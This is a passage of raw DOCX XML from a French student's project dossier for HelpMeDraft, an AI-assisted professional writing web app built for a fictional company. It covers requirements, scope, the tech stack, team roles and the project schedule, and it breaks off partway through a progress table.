        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LexiCorp m'a confié la conception et le développement de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HelpMeDraft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, une application web qui assiste la rédaction de ces documents à l'aide d'une intelligence artificielle générative, dans un espace personnel sécurisé.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="X4db437f98ee1c3cfa82268dd56b471171a88023"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Objectifs fonctionnels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cahier des charges fixe quatre objectifs :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">permettre à l'utilisateur de rédiger et de stocker ses documents professionnels ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lui proposer des suggestions et des reformulations produites par un modèle de langage ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lui offrir un espace personnel sécurisé, avec authentification et historique ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">respecter les exigences de sécurité, d'accessibilité et de confidentialité des données (RGPD, recommandations ANSSI, RGAA).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="Xe69eebc4edd331aad39877f72175d3694c57f9f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Périmètre fonctionnel attendu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">a. Gestion utilisateur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— inscription, connexion, déconnexion, récupération de mot de passe, deux rôles distincts (utilisateur standard et administrateur).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">b. Éditeur de texte intelligent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— une zone de rédaction (Markdown ou WYSIWYG) et trois commandes IA : compléter un paragraphe, reformuler pour un ton professionnel, corriger les fautes de grammaire et d'orthographe. Le résultat doit pouvoir être inséré ou venir remplacer le texte d'origine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">c. Gestion documentaire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— création, modification et suppression de documents, enregistrement automatique, historique des interactions avec l'IA, organisation en dossiers ou catégories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">d. Intégration IA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— appels sécurisés vers le service de génération, prompt engineering dynamique, affichage différencié du résultat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">e. Back-office administrateur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— gestion des utilisateurs, statistiques d'usage (nombre de documents, nombre d'appels au modèle), système de quota de l'ordre de 20 requêtes IA par jour et par utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="X6db0f5d9c2501974f649fc4a286f943d60538b5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exigences non fonctionnelles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Domaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exigence du cahier des charges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentification sécurisée (hachage + JWT ou sessions), stockage chiffré des données sensibles, protection contre XSS, CSRF et injections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Respect du RGAA (version 4.1.2, en vigueur) : contrastes, navigation clavier, balises ARIA ; contrôle par Lighthouse ou WAVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Consentement explicite à l'usage des services IA ; aucune donnée personnelle transmise à OpenAI sans anonymisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éco-conception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chargement différé, poids des dépendances optimisé, compression GZIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une exigence supplémentaire,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">postérieure à la rédaction du cahier des charges</w:t>
      </w:r>
      <w:r>
        <w:t>, s'est ajoutée en cours de projet : les obligations de transparence de l'AI Act, applicables depuis le 2 août 2026 (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="Xd05cc1879bab2903b908698afdb19b362a69363"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Environnement technique recommandé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cahier des charges recommande React + Tailwind ou Bootstrap côté front, Python/Flask côté back, MySQL ou MongoDB en base, OpenAI GPT-4 via API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un LLM local (Ollama), JWT ou Passport.js pour l'authentification, GitHub Actions ou GitLab CI pour l'intégration continue et Docker + docker-compose pour la conteneurisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Un écart assumé par rapport à cette recommandation est justifié en § 5.2 : l'usage de Vue 3 à la place de React. Le choix d'un modèle local Ollama, que le cahier des charges autorise explicitement, y est également argumenté.</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r/>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="28" w:name="X3fe6f3465e309ef0e7afbd741db361977ba68b4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Limites du projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Les éléments suivants ont volontairement été écartés du périmètre : la facturation et la gestion des abonnements, le travail collaboratif en temps réel sur un même document, l'application mobile native, l'export vers des formats bureautiques propriétaires, et l'hébergement de production chez un fournisseur cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le périmètre documentaire est lui aussi borné : HelpMeDraft assiste la rédaction d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">écrits professionnels courants</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— courriels, notes, comptes rendus, rapports, courriers types. Il n'est ni un outil de rédaction d'actes juridiques ni un service de conseil : les CGU rappellent que l'utilisateur reste seul responsable du contenu qu'il produit et des suggestions qu'il accepte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD9C0C" w14:textId="1A56EDCA" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc198828307"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>- la présentation de l’entreprise et du service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>LexiCorp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LexiCorp est une jeune entreprise spécialisée dans les outils de gestion documentaire destinés aux PME. Son positionnement repose sur des solutions légères, rapides à déployer et compatibles avec les contraintes réglementaires françaises et européennes — un argument déterminant auprès d'une clientèle qui manipule des documents contractuels et commerciaux sans disposer d'une direction informatique dédiée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HelpMeDraft constitue pour LexiCorp un nouveau service : passer de l'organisation des documents à l'assistance à leur production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Commanditaire fictif dans le cadre de ma formation CD2IA 2025/2026 à Metz Numeric School. L'entreprise, ses effectifs et son organisation sont posés comme contexte de travail ; les mentions légales intégrées à l'application (raison sociale, capital, SIRET, RCS) sont des données de démonstration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="31" w:name="Xab1991868d77a44b407d97480ffcbb3384cd000"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le service et mon positionnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le projet est rattaché au pôle produit de LexiCorp. J'y intervenais en tant que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">conceptrice développeuse full-stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, seule sur la chaîne de réalisation : analyse des besoins, conception, développement front-end et back-end, conception de la base de données, sécurisation et documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mes interlocuteurs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Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fonction dans le projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Référent pédagogique (MNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tient le rôle de la maîtrise d'ouvrage : valide le cahier des charges, arbitre les écarts, fait le point sur l'avancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Formateurs techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Revue de code, revue d'architecture, conseil sur la sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Promotion CD2IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Revues croisées entre pairs, entraide sur les points de blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette configuration — un seul développeur sur l'ensemble des couches — a directement orienté deux décisions : une architecture volontairement lisible et découpée en couches nettes, pour rester maîtrisable par une personne seule, et une documentation écrite au fil de l'eau plutôt qu'en fin de projet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B584995" w14:textId="69F4200D" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc198828308"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>La gestion de projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Méthode retenue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">J'ai travaillé en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">itérations courtes d'une semaine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, chacune close par un lot fonctionnel utilisable de bout en bout. Le cahier des charges fournissait un plan de développement indicatif ; je l'ai repris comme base de planification en le découpant en lots verticaux — une fonctionnalité traversant le front, l'API et la base — plutôt qu'en couches horizontales. Ce découpage permet de valider une fonctionnalité complète à chaque fin d'itération au lieu d'attendre l'assemblage final.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="X3bbbef98e0a5ffddf9ef886168636ece0a29cca"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Planning et suivi</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Étape (cahier des charges)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Durée prévue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Livrable attendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">État</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Expression des besoins et maquettes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2 semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dossier de conception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mise en place de l'architecture (front, back, BDD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3 semaines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Projet fonctionnel sans logique métier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Intégration IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fonctions « Compléter / Corriger / Reformuler » opérationnelles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tests unitaires, validation RGPD et accessibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fonctionnalités stables et sécurisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Terminé pour les tests et l'accessibilité ; consentement IA distinct restant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CI/CD, dockerisation, déploiement (VM locale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application accessible en ligne ou en réseau local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Conteneurisation et CI terminées ; déploiement restant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentation, soutenance, préparation de l'examen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 semaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dossier et support de présentation prêts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">En cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avancement des lots fonctionnels au moment de la rédaction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Lot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">État</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentification et gestion de compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
